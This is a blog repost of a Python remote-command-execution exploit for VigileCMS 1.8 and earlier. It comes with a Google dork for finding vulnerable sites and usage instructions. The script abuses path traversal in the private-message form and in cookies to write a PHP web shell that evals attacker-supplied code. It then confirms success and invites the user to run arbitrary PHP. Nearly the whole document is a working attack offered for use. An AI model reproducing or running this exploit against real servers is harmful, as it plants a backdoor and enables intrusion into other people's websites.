0day Remote Command Execution] VigileCMS <= 1.8 Stealth

    [多云 November 27, 2007 12:33 | by ]
Google Dork-> Powered by Cms Vigile
------------------------------------------------------------------------------------------------
Use this exploit at your own risk. You are responsible for your own deeds.
Not tested on version < of 1.6
------------------------------------------------------------------------------------------------

Use your brain, do not lame. Enjoy. =)
'''
#Python exploit starts:
#Version 2 of this exploit. Not the one published on some sites.


import sys, httplib, urllib
          
print "\n################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " %s [Target] [Path] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
print " "
print " You may have to set other options in the "
print " code, like port if it isn't 80 "
print " or options for old viglecms' versions. "
print " "
print "################################################\n"
if len(sys.argv)<=1: sys.exit()
else: print "[.]Exploit Starting."


#Some Vars
old = 0 #set to 1 if you are trying to exploit a 1.6 vigile cms version
port = 80
db = "db" #Directory of database
target = sys.argv[1]
try:directory = sys.argv[2]
except IndexError:directory = "/"
#Starting
try:
        #Verifing /db/index.php
        conn = httplib.HTTPConnection(target,port)
        conn.request("GET", "%s%s/index.php" % (directory,db))
        r1 = conn.getresponse()
        print "Verifing existence of-> %s%s%s/index.php" % (target,directory,db),r1.status, r1.reason
        if r1.status == 404:
                print "[-]%s/index.php not found (404)." % (db)
                ver1 = "no"
        conn.close()
        #Verifing /pm/index.php
        conn = httplib.HTTPConnection(target,port)
        conn.request("GET", "%s%s/pm/index.php" % (directory,db))
        r1 = conn.getresponse()
        print "Verifing existence of-> %s%s%s/pm/index.php" % (target,directory,db),r1.status, r1.reason
        if r1.status == 404:
                print"[-]%s/pm/index.php not found (404)." % (db)
                ver2 = "no"
except httplib.ResponseNotReady:
        sys.exit("[-]ResponseNotReady. Aborted. Check your connection.")


if old == 1:
        pt = "/"
        pt2 = "?"
else:
        pt = "?"
        pt2 = "&"
          
if ver1 == "no" or ver2 == "no":
        transversal = ".."
        print "[-]One or more Get request returned 404 error. Trying to continue with / path."
else : transversal = ""


conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': transversal +'/../<?php eval(stripslashes($_GET[dox])); ?>.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #1 -->",response.status, response.reason
conn.close()


conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': transversal +'/../igotyourbox.php' , 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user="+ transversal +"%2F..%2F%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E; rem_pass=paradox-got-this-one;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #2 -->",response.status, response.reason
conn.close()
try:
        if transversal == "..": path = "%sigotyourbox.php" % (directory)
        elif transversal == "": path = "%s%s/igotyourbox.php" % (directory,db)
                          
        conn = httplib.HTTPConnection(target,port)
        conn.request("GET", path)
        r1 = conn.getresponse()
        conn.close()
except httplib.ResponseNotReady:
        sys.exit("[-]ResponseNotReady. Aborted.")
          
print "[.]Verifing Exploit Success..."
if r1.status == 404:
        sys.exit("[-]Exploit Failed.")
else:
        print "[+]Done.\n[+]Removing the page..."
        conn = httplib.HTTPConnection(target,port)
        getrm = path + "?dox=unlink('%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E.paradox-got-this-one.php');"
        conn.request("GET", getrm)
        print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%s \n With Content:\n <?php eval(stripslashes($_GET[dox])); ?>\n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,path)
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(8134)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive